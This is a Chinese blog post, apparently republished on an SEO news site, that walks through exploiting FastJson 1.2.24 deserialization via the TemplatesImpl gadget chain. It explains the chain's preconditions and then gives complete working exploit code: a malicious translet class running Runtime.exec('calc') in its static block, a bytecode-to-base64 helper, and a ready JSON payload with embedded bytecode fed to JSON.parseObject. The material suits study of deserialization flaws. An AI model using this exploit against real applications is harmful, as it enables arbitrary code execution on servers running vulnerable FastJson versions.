当前位置：首页 > news >正文

自己创建小程序青岛seo公司

news 2026/4/7 10:14:11

自己创建小程序,青岛seo公司,汽车工厂视频网站建设,java电商网站模板目录简要原理分析 exp 前文：【Web】关于FastJson反序列化开始前的那些前置知识简要原理分析众所周知TemplatesImpl的利用链是这样的： TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransl…

简要原理分析

exp

前文：【Web】关于FastJson反序列化开始前的那些前置知识

简要原理分析

众所周知TemplatesImpl的利用链是这样的：

TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

而getOutputProperties()正是TemplatesImpl的_outputProperties属性对应的getter方法

所以我们只要利用FJ反序列化会调用类的getter方法的特性来打TemplatesImpl即可

需要注意几点：

①

在调用TemplatesImpl利用链时，defineTransletClasses方法内部会通过_tfactory属性调用一个getExternalExtensionsMap方法，如果_tfactory属性为null则会抛出异常，无法根据_bytecodes属性的内容加载并实例化恶意类

②getTransletInstance方法中判断if (_name == null) return null; 所以要给_name赋值（String）

③_outputProperties：json数据在反序列化时会调用TemplatesImpl类的getOutputProperties方法触发利用链，可以理解为outputProperties属性的作用就是为了调用getOutputProperties方法。

④由于更改的一些TemplatesImpl私有变量没有 setter 方法，需要使用 Feature.SupportNonPublicField 参数。也正是因此，TemplatesImpl这条链的泛用性不强(

exp

pom依赖

 <dependencies><dependency> <groupId>com.alibaba</groupId><artifactId>fastjson</artifactId> <version>1.2.24</version></dependency><dependency><groupId>org.javassist</groupId><artifactId>javassist</artifactId><version>3.29.2-GA</version></dependency></dependencies>

恶意类

package com.FJ;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class Evil extends AbstractTranslet {//构造RCE代码static {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {e.printStackTrace();}}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

字节码转base64小工具

package com.FJ;import javassist.ClassPool;
import java.util.Base64;public class base64util {public static void main(String[] args) throws Exception {byte[] code = ClassPool.getDefault().get(Evil.class.getName()).toBytecode();System.out.println(Base64.getEncoder().encodeToString(code));}
}

召唤计算器的咒语

package com.FJ;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import javassist.*;
import java.io.IOException;public class FJ {public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException {//恶意类Evil转换成字节码，base64编码String byteCode = "yv66vgAAADcAMwoACAAjCgAkACUIACYKACQAJwcAKAoABQApBwAqBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA1MY29tL0ZKL0V2aWw7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACwBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAJAAoHAC0MAC4ALwEABGNhbGMMADAAMQEAE2phdmEvaW8vSU9FeGNlcHRpb24MADIACgEAC2NvbS9GSi9FdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAHAAgAAAAAAAQAAQAJAAoAAQALAAAALwABAAEAAAAFKrcAAbEAAAACAAwAAAAGAAEAAAAJAA0AAAAMAAEAAAAFAA4ADwAAAAEAEAARAAIACwAAAD8AAAADAAAAAbEAAAACAAwAAAAGAAEAAAATAA0AAAAgAAMAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAFAAVAAIAFgAAAAQAAQAXAAEAEAAYAAIACwAAAEkAAAAEAAAAAbEAAAACAAwAAAAGAAEAAAAWAA0AAAAqAAQAAAABAA4ADwAAAAAAAQASABMAAQAAAAEAGQAaAAIAAAABABsAHAADABYAAAAEAAEAFwAIAB0ACgABAAsAAABhAAIAAQAAABK4AAISA7YABFenAAhLKrYABrEAAQAAAAkADAAFAAMADAAAABYABQAAAA0ACQAQAAwADgANAA8AEQARAA0AAAAMAAEADQAEAB4AHwAAACAAAAAHAAJMBwAFBAABACEAAAACACI=";//构造TemplatesImpl的json数据，并将恶意类注入到json数据中final String EVIL_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";String payload = "{\"@type\":\"" + EVIL_CLASS +"\",\"_bytecodes\":[\""+byteCode+"\"]," +"'_name':'XXX'," +"'_tfactory':{}," + //这段代码中的{}是用来表示空的对象实例"\"_outputProperties\":{}}\n";System.out.println(payload);//反序列化Object object = JSON.parseObject(payload,Feature.SupportNonPublicField);}
}

查看全文

http://www.hkea.cn/news/694895/